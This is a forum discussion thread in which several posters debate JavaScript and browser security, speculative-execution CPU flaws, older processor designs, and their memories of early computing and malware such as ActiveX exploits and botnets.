Does nothing for you if the code running in the browser is able to exploit CPU flaws to achieve privilege escalation.
-- Steve O'Hara-Smith | Directable Mirror Arrays C:\>WIN | A better way to focus the sun The computer obeys and wins. | licences available see You lose and Bill collects. | http://www.sohara.org/
Rubbish
-- ?I know that most men, including those at ease with problems of the greatest complexity, can seldom accept even the simplest and most obvious truth if it be such as would oblige them to admit the falsity of conclusions which they have delighted in explaining to colleagues, which they have proudly taught to others, and which they have woven, thread by thread, into the fabric of their lives.?
? Leo Tolstoy
Problem is look-ahead caching
Modern processors use it to gain speed, but it blows away process compartmentalisation.
--
?I know that most men, including those at ease with problems of the
greatest complexity, can seldom accept even the simplest and most
obvious truth if it be such as would oblige them to admit the falsity of
conclusions which they have delighted in explaining to colleagues, which
they have proudly taught to others, and which they have woven, thread by
thread, into the fabric of their lives.?
? Leo Tolstoy
"Robert Riches" wrote
| > When you combine the corporate security model with | > SOHo usage you get crazy risk. | | There is a solution that significantly decreases risk when | allowing JavaScript in a web browser: | | Run the browser from a different (browser-only) user account | that has very strictly controlled access to files owned by | your normal account. |
That seems like an awfully lot of work to me. I don't even use a restricted user account in the first place. Since most people do, any malware attack has to be able to bypass the restrictions and the only result is that I can't access my own files!
But I guess that's at least some help if people bank online. I avoid doing things like that. For awhile I've taken an approach of having 2 gecko browsers on all computers. One is Firefox with NoScript, which I use if I must enable script. The other is New Moon, Pale Moon, or Waterfox, with the prefs set for optimal privacy and security -- blocking script, iframes, 3rd party files, prefetch, autorefresh, and so on. I rarely need to use the browser with script. And I've never liked things moving on webpages, anyway. So I don't mind the simpler layout. Though I have to admit that pages are becoming increasingly broken. I often end up toggling CSS off in order to get links to work or to see text that webmasters have hidden from anyone disabling script.
Push has never really taken off, but increasingly javascript is being used to make pages work like an interactive broadcast. Either you let them spy on you, and let them change the webpage as you're viewing it, or they'll do their best to make sure you can't view it at all. So much for the information superhighway. What we've ended up with is sleazeballs, large and small, each fashioning their own custom turnpike to extort from passersby.
"Deloptes" wrote
| Mayayana wrote: | | > When you combine the corporate security model with | > SOHo usage you get crazy risk. | | @Mayayana, I am becoming a fan of you.
Thank you. I don't actually find many people agree with that. Even most programmers, having been trained in a corporate environment, subscribe to the idea that all will be well as long as everyone is restricted to being a lackey user with no rights to do anything but write their own MS Word files.
"The Natural Philosopher" wrote
| On 28/08/2020 12:54, Mayayana wrote: | > Simple rule: If you allow javascript or other executable | > code online, you're a sitting duck. If you also store private | > data on your computer, use credit cards online, bank | > online, etc, you're a sitting duck with something to lose. | | Rubbish |
Interesting reasoning. I think I have to agree with Leo T on this one. :)
| -- | "I know that most men, including those at ease with problems of the | greatest complexity, can seldom accept even the simplest and most | obvious truth if it be such as would oblige them to admit the falsity of | conclusions which they have delighted in explaining to colleagues, which | they have proudly taught to others, and which they have woven, thread by | thread, into the fabric of their lives." | | ? Leo Tolstoy
ed:
lementation_issues
Even the ARM2 was pipelined, you'll probably have to go back to the 8 bit ear such as the 6502, to find one which wasn't.
Pipelining isn't the problem though, its the vastly more complex aspects
of modern processors such as branch prediction, speculative execution and caching which are targetted by these exploits.
No protected information is directly leaked by the bugs, but manipulations of these features can allow protected information to be deduced from timing differences of cached or uncached memory accesses.
---druck
indeed. he is most apposite. The difference between theoretical risk and practical risk is huge - as anyone who has tried to actually hack anything or run a public facing server will tell you.In the real world the quality of attacks is abysmally low. But try to convince an armchair expert of that...
-- "What do you think about Gay Marriage?" "I don't." "Don't what?" "Think about Gay Marriage."
Fair comment - the 6809, which it the 8/16 bit chip I know best from writing a fair amount assembler on one back on the day, of isn't pipelined either.
I also have a lot of time on a 68020, running OS-9/68000 but only writing C and a 4GL on it, so I am relatively unfamiliar with its execution modes.
The 68020 has a 3-stage pipeline and a 256 byte instruction cache, but no protected address space or protection rings. I'd guess from this that it is impervious to Spectre or similar attacks - not that you'd ever need them because all RAM is accessible to any process. BTW, under OS-9 all processes are written in position-independent code, so processes can be loaded anywhere in RAM and the OS can move any user process in RAM, provided its not running - something that is guaranteed while the OS is rearranging processes in memory.
-- Martin | martin at Gregorie | gregorie dot org
I don't know how old are you, but my observation is that things went worse in the past 10-15y, especially after the smart phones went out. But it also could be that before the things were not that obvious.
I started programming in 1978 and have a slightly different take on it. I was in the industry 2-3 years before COBOL appeared. Before that almost all commercial software was written assembler and the lifetime of a lot of systems was 3-4 years. No online access - the programmers friend was a
12 key card punch and the main problem was that there was no documentation maintained and bugger-all comments in programs, so a lot of code was unmaintainable.I ran into online programming (on a teletype) in 1970 and by 1973 'glass teletypes' had appeared. From 1973-1975 or so terminals started to appear on mainframes but most commercial programming was in COBOL and a lot was still done with card input and source held on mag tapes or disks. We had local greenscreen terminals and no connectivity outside the office. This was on a job in 1976/77 on an ICL 2903 but I don't recall any more than cursory attention to security: it just wasn't an issue in those days. Throughout this era that was little attention given to security or to maintaining system documentation - one company (Smiths Industries) had a fixed policy that all documentation was destroyed as soon as a system or fix went live despite this being the period when systems lifetimes started to extend quire drastically.
After a year off, I started work at the BBC in 1978 (ICL 2966 / COBOL IDMSX database) and in about 1980 I did my first real online system, an online music planning system for Radio 3. Again, no external connectivity and 24 x 80 greenscreens, but we did use online logins and the login name controlled what a logged-in user could do: music producers could enquire, the music planning staff could update programs, their supervisors could update the music and performer catalogues used to plan, record, perform and reuse musical programs and concerts, and the sysadmin could do everything. We wrote better documentation that for any earlier system I worked on, but it still wasn't great.
Its fair to say that I never saw either good documentation or serious concern about system security until I joined Logica in 1984: there both were de rigeur.
-- Martin | martin at Gregorie | gregorie dot org
"Deloptes" wrote
| I don't know how old are you, but my observation is that things went worse | in the past 10-15y, especially after the smart phones went out. | But it also could be that before the things were not that obvious. |
I'm a babyboomer, but only discovered computers with Win98. Then I got hooked and taught myself Windows programming. So I don't have the long view that you old men have. :)
I guess what I saw was great fun with the PC fad of the late 90s. Then some malware written by geeks or teenagers for fun. Exploitation of ActiveX in IE. Melissa. Remember that one? some office worker decided to play a practical joke with script in a Word DOC and it became a disaster. That kind of thing. I though MS were brilliant with ActiveX. They just didn't see the security problems coming.
Security then became an excuse to start locking down and turning computers into service devices. I guess that would be about the last 10-15 years. From there it became big business, with sophisticated hackers. But neither governments nor businesses want people to have privacy or control their devices. So how do we establish security protocols?
I'm kind of surprised that no one's written a sci-fi horror story where hackers erase all of the data around the world, after it's all gone digital, and ownership of all kinds is erased. What a mess that would be. History erased. Records erased. Communication. Deeds. Bank accounts. All gone in a flash. Yet people continue to digitize data that doesn't need to be digitized and add computers to machines that don't need them.
Even one super solar flare, which supposedly happens every few hundred years could possibly fry all integrated circuits. 30 years ago that would have been a minor issue. Today it would stop cars, computers, utilities... everything. Yet people keep spending hundreds of dollars for watches to tell them their heart is beating. So I try to avoid unnecessary computerization.
"Martin Gregorie" wrote
| I started programming in 1978 and have a slightly different take on it. I | was in the industry 2-3 years before COBOL appeared. Before that almost | all commercial software was written assembler and the lifetime of a lot | of systems was 3-4 years. No online access - the programmers friend was a | 12 key card punch and the main problem was that there was no | documentation maintained and bugger-all comments in programs, so a lot of | code was unmaintainable. | | I ran into online programming (on a teletype) in 1970 and by 1973 'glass | teletypes' had appeared. From 1973-1975 or so terminals started to appear | on mainframes but most commercial programming was in COBOL and a lot was | still done with card input and source held on mag tapes or disks. We had | local greenscreen terminals and no connectivity outside the office. This | was on a job in 1976/77 on an ICL 2903 but I don't recall any more than | cursory attention to security: it just wasn't an issue in those days. | Throughout this era that was little attention given to security or to | maintaining system documentation - one company (Smiths Industries) had a | fixed policy that all documentation was destroyed as soon as a system or | fix went live despite this being the period when systems lifetimes | started to extend quire drastically. | | After a year off, I started work at the BBC in 1978 (ICL 2966 / COBOL | IDMSX database) and in about 1980 I did my first real online system, an | online music planning system for Radio 3. Again, no external connectivity | and 24 x 80 greenscreens, but we did use online logins and the login name | controlled what a logged-in user could do: music producers could enquire, | the music planning staff could update programs, their supervisors could | update the music and performer catalogues used to plan, record, perform | and reuse musical programs and concerts, and the sysadmin could do | everything. We wrote better documentation that for any earlier system I | worked on, but it still wasn't great. | | Its fair to say that I never saw either good documentation or serious | concern about system security until I joined Logica in 1984: there both | were de rigeur. | That's all before my time. I remember having a housemate in '82 who bought a Commodore 64. $300 to play hangman on a B/W TV screen about
5 inches across. I thought he was out of his mind. :)But in my limited experience it doesn't seem like we've really needed security until recently, except maybe at the CIA. Only recently have people banked online, used electronic credit card readers, and so on. In
2000, what could people steal from your computer or gain from hacking into your online connection? Not very much. Maybe they could steal your AOL password.
Not quite your plot, but there is some decidedly prescient SF on the subject:
Start with William Gibson's 'Neuromancer" (1984).
If you like that one, try his 'Count Zero' and 'Burning Chrome'
Neal Stephenson's "Snow Crash" is also rather good, as is "Cryptonomicon".
-- Martin | martin at Gregorie | gregorie dot org
Depends what you're doing. The CHAPS financial network went live in 1984 as the first network where the message WAS the money and has always run on a private network transferring messages that are encrypted in special tamper-proof modules. SWIFT was earlier, first message passed in 1977, but SWIFT messages are merely *about* money: unlike CHAPS, they are not money transfers.
Another marker: the first time I saw a personal computer was in 1976 at "The Computer Store" in NYC at 5th and 35th. That's before Apple but not by much - the hot machines were made by SWTPC and IMSAI. We had an Apple II at the BBC in 1978 - I used it to demonstrate how a centralised journalist's contact database might look and work.
I'd put the start of hackery a bit earlier: soon after 1990, when the first web browser was released. That, and Win 95 really marked the start of 'just folks' rather than just IT professionals and computer enthusiasts starting to use data networks. A student wrote (and lost control of) the first Internet worm around that time.
Win 95 had ZERO security and, sadly, Windoze, is still rather behind the times in that sphere.
-- Martin | martin at Gregorie | gregorie dot org
Whereas some of us saw ActiveX for the first time and shook our heads in sorrow because it looked like the most stupid idea we'd seen since email clients that allowed attachments to execute.
-- Steve O'Hara-Smith | Directable Mirror Arrays C:\>WIN | A better way to focus the sun The computer obeys and wins. | licences available see You lose and Bill collects. | http://www.sohara.org/
Many years ago now I read a paper on the subject of viruses, worms et al that made the point that a well written penetration should go unnoticed as it silently hijacks some proportion of your resources. The paper went on to describe in detail the principles behind what is now known as a botnet, a large set of compromised machines and a private encrypted virtual network via which they may be controlled. There are a lot of them around these days and renting use of them is commonplace.
Anyone who runs a public facing server will certainly tell you that they have logs full of long obsolete script-kiddy attacks on misconfigured servers and injection attack probes and so on. However if they are ever successfully compromised by a professional the chances are they'll never know anything about it.
-- Steve O'Hara-Smith | Directable Mirror Arrays C:\>WIN | A better way to focus the sun The computer obeys and wins. | licences available see You lose and Bill collects. | http://www.sohara.org/
"Ahem A Rivet's Shot" wrote
| > That kind of thing. I though MS were brilliant with | > ActiveX. They just didn't see the security problems | > coming. | | Whereas some of us saw ActiveX for the first time and shook our | heads in sorrow because it looked like the most stupid idea we'd seen since | email clients that allowed attachments to execute. |
You really thought that back then? It's what allowed them to beat Netscape. For years it was a brilliant design. It still is. It's just not safe. I write a lot of HTAs, using script and COM for the functionality and IE for the GUI.
It doesn't blow it away; it makes a very very difficult and very very ineffective attack theoretically possible.
I'm pretty certain none of these timing related speculative execution vulnerabilities have ever been found being used "in the wild" by malicious hackers.
-- Brian Gregory (in England).
They just made IE part of the OS and this was the reason for the trails.
ElectronDepot website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.